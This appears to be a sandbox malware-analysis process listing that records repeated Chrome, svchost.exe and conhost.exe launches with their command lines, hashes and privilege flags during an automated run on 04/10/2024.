                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:14
                                                                                Start time:05:33:56
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff7e52b0000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:15
                                                                                Start time:05:33:56
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Target ID:16
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:17
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:18
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:19
                                                                                Start time:05:34:00
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:20
                                                                                Start time:05:34:04
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:21
                                                                                Start time:05:34:04
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:22
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff6a5670000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:23
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:24
                                                                                Start time:05:34:07
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:25
                                                                                Start time:05:34:08
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:26
                                                                                Start time:05:34:13
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:27
                                                                                Start time:05:34:14
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:29
                                                                                Start time:05:34:17
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:30
                                                                                Start time:05:34:17
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:31
                                                                                Start time:05:34:18
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:32
                                                                                Start time:05:34:18
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:33
                                                                                Start time:05:34:21
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:34
                                                                                Start time:05:34:23
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:35
                                                                                Start time:05:34:27
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:36
                                                                                Start time:05:34:27
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:37
                                                                                Start time:05:34:28
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:38
                                                                                Start time:05:34:28
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:40
                                                                                Start time:05:34:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff6068e0000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:41
                                                                                Start time:05:34:33
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:42
                                                                                Start time:05:34:37
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:43
                                                                                Start time:05:34:37
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:44
                                                                                Start time:05:34:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:45
                                                                                Start time:05:34:38
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:46
                                                                                Start time:05:34:41
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:47
                                                                                Start time:05:34:41
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:48
                                                                                Start time:05:34:44
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:49
                                                                                Start time:05:34:44
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:50
                                                                                Start time:05:34:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:51
                                                                                Start time:05:34:45
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:52
                                                                                Start time:05:34:49
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:53
                                                                                Start time:05:34:50
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:54
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:55
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                Imagebase:0x7ff715980000
                                                                                File size:3'242'272 bytes
                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                Target ID:56
                                                                                Start time:05:34:54
                                                                                Start date:04/10/2024
                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:svchost.exe
                                                                                Imagebase:0x4d0000
                                                                                File size:46'504 bytes
                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

